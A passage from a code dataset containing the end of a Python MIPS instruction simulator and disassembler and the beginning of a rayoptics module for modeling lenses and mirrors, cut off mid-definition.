int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'AND'\r\n\t\r\n\tregisters[int(rd)] = int(str((bin(registers[int(rs)]) & bin(registers[int(rt)]))),2)\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef OR(ins, registers, data, address, out1, out2, endPt, data2, disCheck):\r\n\trs = int(str(bin(ins))[8:13],2)\r\n\trt = int(str(bin(ins))[13:18],2)\r\n\trd = int(str(bin(ins))[18:23],2)\r\n\top = 'OR'\r\n\t\r\n\tregisters[int(rd)] = int(str((bin(registers[int(rs)]) | bin(registers[int(rt)]))),2)\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef BREAK(ins, registers, address, data, out1, out2, endPt, addresses, x, instructions, data2, disCheck):\r\n\top = 'BREAK'\r\n\t\t\t\r\n\tprintSim(ins, registers, op, data, address, out2, endPt)\r\n\t\r\ndef initializeRegisters(registers):\r\n\tx = 0\r\n\twhile (x < 32):\r\n\t\tregisters.append(0)\r\n\t\tx = x + 1\r\n\t\t\r\ndef printDis(ins, registers, op, data, address, disOut, endPt):\r\n\t#print dis stuff\r\n\tif (op == 'J'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\t#' + str((int(bin(ins)[8:],2)) * 4) + '\\n')\r\n\telif (op == 'ADDI'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'ADD'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'JR'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + '\\n')\r\n\telif (op == 'SUB'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'SLL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n')\r\n\telif (op == 'SRL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n')\r\n\telif (op == 'MUL'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[23:34],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'MOVZ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'OR'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'AND'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n')\r\n\telif (op == 'SW'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '(' + str(int(str(bin(ins))[8:13],2)) + ')\\n')\r\n\telif (op == 'LW'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '(' + str(int(str(bin(ins))[8:13],2)) + ')\\n')\r\n\telif (op == 'BLTZ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'BEQ'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', ' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n')\r\n\telif (op == 'NOP'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\n')\r\n\telif (op == 'BREAK'):\r\n\t\tdisOut.write(str(bin(ins))[2:3] + ' ' + str(bin(ins))[3:8] + ' ' + str(bin(ins))[8:13] + ' ' + str(bin(ins))[13:18] + ' ' + str(bin(ins))[18:23] + ' ' + str(bin(ins))[23:28] + ' ' + str(bin(ins))[28:] + ' ' + str(address) + '\\t' + str(op) + '\\n')\r\n\r\ndef printDisData(instructions, addresses, data, location, disOut):\r\n\tfor x in range(1, len(data) + 1):\r\n\t\tnum = str(bin(instructions[location + x])[2:])\r\n\t\tnumLength = len(num)\r\n\t\tif (numLength != 32):\r\n\t\t\tnumToAdd = 32 - numLength\r\n\t\t\tnum = str('0' * numToAdd) + str(num)\r\n\t\tdisOut.write(str(num) + '\\t' + str(addresses[location + x]) + '\\t' + str(int(data[x - 1])) + '\\n')\r\n\t\r\ndef printSim(ins, registers, op, data, address, simOut, endPt):\r\n\t#print sim stuff that modifies registers from here\r\n\tsimOut.write('====================\\n')\r\n\tglobal imm\r\n\t\r\n\tif (op == 'J'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\t#' + str((int(bin(ins)[8:],2)) * 4) + '\\n\\n')\r\n\telif (op == 'ADDI'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(imm) + '\\n\\n')\r\n\telif (op == 'ADD'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'JR'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(bin(ins)[8:13],2)) + '\\n\\n')\r\n\telif (op == 'SUB'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'SLL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n\\n')\r\n\telif (op == 'SRL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[23:28],2)) + '\\n\\n')\r\n\telif (op == 'MUL'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[23:34],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'MOVZ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'NOP'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\n\\n')\r\n\telif (op == 'BREAK'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\n\\n')\r\n\telif (op == 'OR'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'AND'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[18:23],2)) + ', R' + str(int(str(bin(ins))[8:13],2)) + ', R' + str(int(str(bin(ins))[13:18],2)) + '\\n\\n')\r\n\telif (op == 'SW'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', ' + str(int(str(bin(ins))[18:],2)) + '(R' + str(int(str(bin(ins))[8:13],2)) + ')\\n\\n')\r\n\telif (op == 'LW'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[13:18],2)) + ', ' + str(int(str(bin(ins))[18:],2)) + '(R' + str(int(str(bin(ins))[8:13],2)) + ')\\n\\n')\r\n\telif (op == 'BLTZ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n\\n')\r\n\telif (op == 'BEQ'):\r\n\t\tsimOut.write('cycle:' + str(cycle) + '\\t' + str(address) + '\\t' + str(op) + '\\tR' + str(int(str(bin(ins))[8:13],2)) + ', ' + str(int(str(bin(ins))[13:18],2)) + ', #' + str(int(str(bin(ins))[18:],2)) + '\\n\\n')\r\n\t\r\n\t#outside if block:\r\n\tsimOut.write('registers:\\nr00:\\t' + str(registers[0]) + '\\t' + str(registers[1]) + '\\t' + str(registers[2]) + '\\t' + str(registers[3]) + '\\t' + str(registers[4]) + '\\t' + str(registers[5]) + '\\t' + str(registers[6]) + '\\t' + str(registers[7]))\r\n\tsimOut.write('\\nr08:\\t' + str(registers[8]) + '\\t' + str(registers[9]) + '\\t' + str(registers[10]) + '\\t' + str(registers[11]) + '\\t' + str(registers[12]) + '\\t' + str(registers[13]) + '\\t' + str(registers[14]) + '\\t' + str(registers[15]))\r\n\tsimOut.write('\\nr16:\\t' + str(registers[16]) + '\\t' + str(registers[17]) + '\\t' + str(registers[18]) + '\\t' + str(registers[19]) + '\\t' + str(registers[20]) + '\\t' + str(registers[21]) + '\\t' + str(registers[22]) + '\\t' + str(registers[23]))\r\n\tsimOut.write('\\nr24:\\t' + str(registers[24]) + '\\t' + str(registers[25]) + '\\t' + str(registers[26]) + '\\t' + str(registers[27]) + '\\t' + str(registers[28]) + '\\t' + str(registers[29]) + '\\t' + str(registers[30]) + '\\t' + str(registers[31]))\r\n\tsimOut.write('\\n\\ndata:\\n')\r\n\t\r\n\tdataSize = len(data) #used for how many data points are to be printed\r\n\tlistLength = int(dataSize/8) #used for how many lines needed to be printed\r\n\tif (listLength == 0):\r\n\t\tlistLength = 1\r\n\tglobal addressList\r\n\tdataLocation = None\r\n\tdataLocation = endPt #used for looking up address - endpt\r\n\tinfoLocation = 0 #used to track where in the data list the program is\r\n\ti = 0\r\n\t\r\n\twhile (i < listLength):\r\n\t\tsimOut.write(str(addressList[dataLocation]) + ':\\t')\r\n\t\tj = 0\r\n\t\ti = i + 1\r\n\t\twhile (j < 8):\r\n\t\t\tif (j == (dataSize - 1)):\r\n\t\t\t\tj = 8\r\n\t\t\tsimOut.write(str(data[infoLocation]) + '\\t')\r\n\t\t\tinfoLocation = infoLocation + 1\r\n\t\t\tj = j + 1\r\n\t\tsimOut.write('\\n')\r\n\tsimOut.write('\\n')\r\n\r\ndef printInvalid(ins, address, disOut):\r\n\tbinNum = str(bin(ins)[2:])\r\n\tnumLength = len(binNum)\r\n\tif (numLength != 32):\r\n\t\tnumToAdd = 32 - numLength\r\n\t\tbinNum = str('0' * numToAdd) + str(binNum)\r\n\tdisOut.write(str(binNum)[2:3] + ' ' + str(binNum)[3:8] + ' ' + str(binNum)[8:13] + ' ' + str(binNum)[13:18] + ' ' + str(binNum)[18:23] + ' ' + str(binNum)[23:28] + ' ' + str(binNum)[28:] + '\\t' + str(address) + '\\t' + 'Invalid Instruction\\n')\r\n\r\ndef main():\r\n\t#file io stuff:\r\n\tdisOut = open(sys.argv[2] + '_dis.txt', 'w')\r\n\tsimOut = open(sys.argv[2] + '_sim.txt', 'w')\r\n\t\r\n\tinstructions = []\r\n\topCode = []\r\n\trsBits = []\r\n\tfuncBits = []\r\n\timmediate = []\r\n\t#data is initialized after the break.\r\n\tdata = []\r\n\tregisters = []\r\n\tinitializeRegisters(registers)\r\n\tstdOPCodes = initializeOPCodes()\r\n\taddresses = readFromFile(opCode, rsBits, instructions, immediate)\r\n\tfuncBits = initializeFuncCodes(instructions)\r\n\tvalidity = checkOPCode(opCode, stdOPCodes) #false if invalid, true if valid, makes for printing and reading easier later.\r\n\tinstructionEnd = getData(data, validity, instructions)\r\n\tdetermineInstruction(instructions, opCode, funcBits, stdOPCodes, validity, instructionEnd, data, registers, addresses, disOut, simOut, immediate)\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n","sub_path":"mipssim.py","file_name":"mipssim.py","file_ext":"py","file_size_in_byte":29086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375656429","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright © 2018 Michael J. Hayford\n\"\"\" Module for element modeling\n\n.. Created on Sun Jan 28 16:27:01 2018\n\n.. codeauthor: Michael J. Hayford\n\"\"\"\n\nimport logging\nfrom collections import namedtuple\n\nimport math\nimport numpy as np\n\nimport rayoptics.util.rgbtable as rgbt\nimport rayoptics.optical.thinlens as thinlens\nfrom rayoptics.optical.profiles import Spherical, Conic\nfrom rayoptics.optical.surface import Surface\nfrom rayoptics.optical.gap import Gap\nimport rayoptics.gui.appcmds as cmds\nfrom rayoptics.gui.actions import Action, AttrAction, SagAction, BendAction\nfrom rayoptics.optical.medium import Glass, glass_decode\nfrom rayoptics.optical.model_enums import DecenterType\nimport rayoptics.optical.model_constants as mc\nimport opticalglass.glasspolygons as gp\n\nGraphicsHandle = namedtuple('GraphicsHandle', ['polydata', 'tfrm', 'polytype'])\n\"\"\" tuple grouping together graphics rendering data\n\n Attributes:\n polydata: poly data in local coordinates\n tfrm: global transformation for polydata\n polytype: 'polygon' (for filled) or 'polyline'\n\"\"\"\n\n\ndef create_thinlens(power=0., indx=1.5, sd=None, **kwargs):\n tl = thinlens.ThinLens(power=power, ref_index=indx, max_ap=sd, **kwargs)\n tle = ThinElement(tl)\n return [[tl, None, None, 1, +1]], [tle]\n\n\ndef create_mirror(c=0.0, r=None, cc=0.0, ec=None,\n power=None, profile=None, sd=None, **kwargs):\n '''Create a sequence and element for a mirror.\n\n Args:\n c: vertex curvature\n r: vertex radius of curvature\n cc: conic constant\n ec: 1 + cc\n power: optical power of the mirror\n sd: semi-diameter\n profile: Spherical or Conic\n '''\n delta_n = kwargs['delta_n'] if 'delta_n' in kwargs else -2\n if power:\n cv = power/delta_n\n elif r:\n cv = 1.0/r\n else:\n cv = c\n\n if ec:\n k = ec - 1.0\n else:\n k = cc\n\n if profile is Spherical:\n prf = Spherical(c=cv)\n elif profile is Conic:\n prf = Conic(c=cv, cc=k)\n else:\n if k == 0.0:\n prf = Spherical(c=cv)\n else:\n prf = Conic(c=cv, cc=k)\n\n m = Surface(profile=prf, interact_mode='reflect', max_ap=sd,\n delta_n=delta_n, **kwargs)\n me = Mirror(m, sd=sd)\n return [[m, None, None, 1, -1]], [me]\n\n\ndef create_lens(power=0., bending=0., th=None, sd=1., med=None):\n if med is None:\n med = Glass()\n rndx = med.rindex('d')\n cv1 = power/(2*(rndx - 1))\n cv2 = -power/(2*(rndx - 1))\n s1 = Surface(profile=Spherical(c=cv1), max_ap=sd, delta_n=(rndx - 1))\n s2 = Surface(profile=Spherical(c=cv2), max_ap=sd, delta_n=(1 - rndx))\n if th is None:\n th = sd/5\n g = Gap(t=th, med=med)\n le = Element(s1, s2, g, sd=sd)\n return [[s1, g, None, rndx, 1], [s2, None, None, 1, 1]], [le]\n\n\ndef create_dummy_plane(sd=1., **kwargs):\n s = Surface(**kwargs)\n se = DummyInterface(s, sd=sd)\n return [[s, None, None, 1, +1]], [se]\n\n\ndef create_air_gap(t=0., ref_ifc=None):\n g = Gap(t=t)\n ag = AirGap(g, ref_ifc)\n return g, ag\n\n\ndef create_from_file(filename, **kwargs):\n opm = cmds.open_model(filename)\n sm = opm.seq_model\n osp = opm.optical_spec\n em = opm.ele_model\n if 'power' in kwargs:\n desired_power = kwargs['power']\n cur_power = osp.parax_data.fod.power\n scale_factor = desired_power/cur_power\n sm.apply_scale_factor(scale_factor)\n em.elements_from_sequence(sm)\n seq = [list(node) for node in sm.path(start=1, stop=-1)]\n ele = [em.gap_dict[g] for g in sm.gaps[1:-1]]\n return seq, ele\n\n\nclass Element():\n clut = rgbt.RGBTable(filename='red_blue64.csv',\n data_range=[10.0, 100.])\n\n label_format = 'E{}'\n\n def __init__(self, s1, s2, g, tfrm=None, idx=0, idx2=1, sd=1.,\n label='Lens'):\n self.label = label\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s1 = s1\n self.s1_indx = idx\n self.s2 = s2\n self.s2_indx = idx2\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self._sd = sd\n self.flat1 = None\n self.flat2 = None\n self.render_color = self.calc_render_color()\n self.handles = {}\n self.actions = {}\n\n @property\n def sd(self):\n return self._sd\n\n @sd.setter\n def sd(self, semidiam):\n self._sd = semidiam\n self.edge_extent = (-semidiam, semidiam)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s1']\n del attrs['s2']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n fmt = 'Element: {!r}, {!r}, t={:.4f}, sd={:.4f}, glass: {}'\n return fmt.format(self.s1.profile, self.s2.profile, self.gap.thi,\n self.sd, self.gap.medium.name())\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n # when restoring, we want to use the stored indices to look up the\n # new object instances\n self.parent = ele_model\n self.tfrm = tfrms[self.s1_indx]\n self.s1 = surfs[self.s1_indx]\n self.gap = gaps[self.s1_indx]\n self.s2 = surfs[self.s2_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n def sync_to_update(self, seq_model):\n # when updating, we want to use the stored object instances to get the\n # current indices into the interface list (e.g. to handle insertion and\n # deletion of interfaces)\n self.s1_indx = seq_model.ifcs.index(self.s1)\n self.s2_indx = seq_model.ifcs.index(self.s2)\n self.render_color = self.calc_render_color()\n\n def reference_interface(self):\n return self.s1\n\n def reference_idx(self):\n return self.s1_indx\n\n def interface_list(self):\n return [self.s1, self.s2]\n\n def gap_list(self):\n return [self.gap]\n\n def get_bending(self):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n bending = 0.\n if delta_cv != 0.0:\n bending = (cv1 + cv2)/delta_cv\n return bending\n\n def set_bending(self, bending):\n cv1 = self.s1.profile_cv\n cv2 = self.s2.profile_cv\n delta_cv = cv1 - cv2\n cv2_new = 0.5*(bending - 1.)*delta_cv\n cv1_new = bending*delta_cv - cv2_new\n self.s1.profile_cv = cv1_new\n self.s2.profile_cv = cv2_new\n\n def update_size(self):\n extents = np.union1d(self.s1.get_y_aperture_extent(),\n self.s2.get_y_aperture_extent())\n self.edge_extent = (extents[0], extents[-1])\n self.sd = max(self.s1.surface_od(), self.s2.surface_od())\n return self.sd\n\n def calc_render_color(self):\n try:\n gc = float(self.gap.medium.glass_code())\n except AttributeError:\n return (255, 255, 255, 64) # white\n else:\n # set element color based on V-number\n indx, vnbr = glass_decode(gc)\n dsg, rgb = gp.find_glass_designation(indx, vnbr)\n# rgb = Element.clut.get_color(vnbr)\n return rgb\n\n def compute_flat(self, s):\n ca = s.surface_od()\n if (1.0 - ca/self.sd) >= 0.05:\n flat = ca\n else:\n flat = None\n return flat\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n return (-self.sd, self.sd)\n\n def render_shape(self):\n if self.s1.profile_cv < 0.0:\n self.flat1 = self.compute_flat(self.s1)\n poly = self.s1.full_profile(self.extent(), self.flat1)\n if self.s2.profile_cv > 0.0:\n self.flat2 = self.compute_flat(self.s2)\n poly2 = self.s2.full_profile(self.extent(), self.flat2, -1)\n for p in poly2:\n p[0] += self.gap.thi\n poly += poly2\n poly.append(poly[0])\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n ifcs_gbl_tfrms = opt_model.seq_model.gbl_tfrms\n\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n\n extent = self.extent()\n if self.flat1 is not None:\n extent_s1 = self.flat1,\n else:\n extent_s1 = extent\n poly_s1 = self.s1.full_profile(extent_s1, None)\n gh1 = GraphicsHandle(poly_s1, ifcs_gbl_tfrms[self.s1_indx], 'polyline')\n self.handles['s1_profile'] = gh1\n\n if self.flat2 is not None:\n extent_s2 = self.flat2,\n else:\n extent_s2 = extent\n poly_s2 = self.s2.full_profile(extent_s2, None, -1)\n gh2 = GraphicsHandle(poly_s2, ifcs_gbl_tfrms[self.s2_indx], 'polyline')\n self.handles['s2_profile'] = gh2\n\n poly_sd_upr = []\n poly_sd_upr.append([poly_s1[-1][0], extent[1]])\n poly_sd_upr.append([poly_s2[0][0]+self.gap.thi, extent[1]])\n self.handles['sd_upr'] = GraphicsHandle(poly_sd_upr, self.tfrm,\n 'polyline')\n\n poly_sd_lwr = []\n poly_sd_lwr.append([poly_s2[-1][0]+self.gap.thi, extent[0]])\n poly_sd_lwr.append([poly_s1[0][0], extent[0]])\n self.handles['sd_lwr'] = GraphicsHandle(poly_sd_lwr, self.tfrm,\n 'polyline')\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n self.handles['ct'] = GraphicsHandle(poly_ct, self.tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n shape_actions = {}\n shape_actions['pt'] = BendAction(self)\n shape_actions['y'] = AttrAction(self, 'sd')\n self.actions['shape'] = shape_actions\n\n s1_prof_actions = {}\n s1_prof_actions['pt'] = SagAction(self.s1)\n self.actions['s1_profile'] = s1_prof_actions\n\n s2_prof_actions = {}\n s2_prof_actions['pt'] = SagAction(self.s2)\n self.actions['s2_profile'] = s2_prof_actions\n\n sd_upr_action = {}\n sd_upr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_upr'] = sd_upr_action\n\n sd_lwr_action = {}\n sd_lwr_action['y'] = AttrAction(self, 'sd')\n self.actions['sd_lwr'] = sd_lwr_action\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\nclass Mirror():\n\n label_format = 'M{}'\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=1., thi=None, z_dir=1.0,\n label='Mirror'):\n self.label = label\n# self.render_color = (192, 192, 192, 112)\n self.render_color = (158, 158, 158, 64)\n# self.render_color = (64, 64, 64, 64)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.s = ifc\n self.s_indx = idx\n self.z_dir = z_dir\n self.sd = sd\n self.flat = None\n self.thi = thi\n self.medium_name = 'Mirror'\n self.handles = {}\n self.actions = {}\n\n def get_thi(self):\n thi = self.thi\n if self.thi is None:\n thi = 0.05*self.sd\n return thi\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['s']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n thi = self.get_thi()\n fmt = 'Mirror: {!r}, t={:.4f}, sd={:.4f}'\n return fmt.format(self.s.profile, thi, self.sd)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.s_indx]\n self.s = surfs[self.s_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Mirror'\n\n def reference_interface(self):\n return self.s\n\n def reference_idx(self):\n return self.s_indx\n\n def interface_list(self):\n return [self.s]\n\n def gap_list(self):\n return []\n\n def 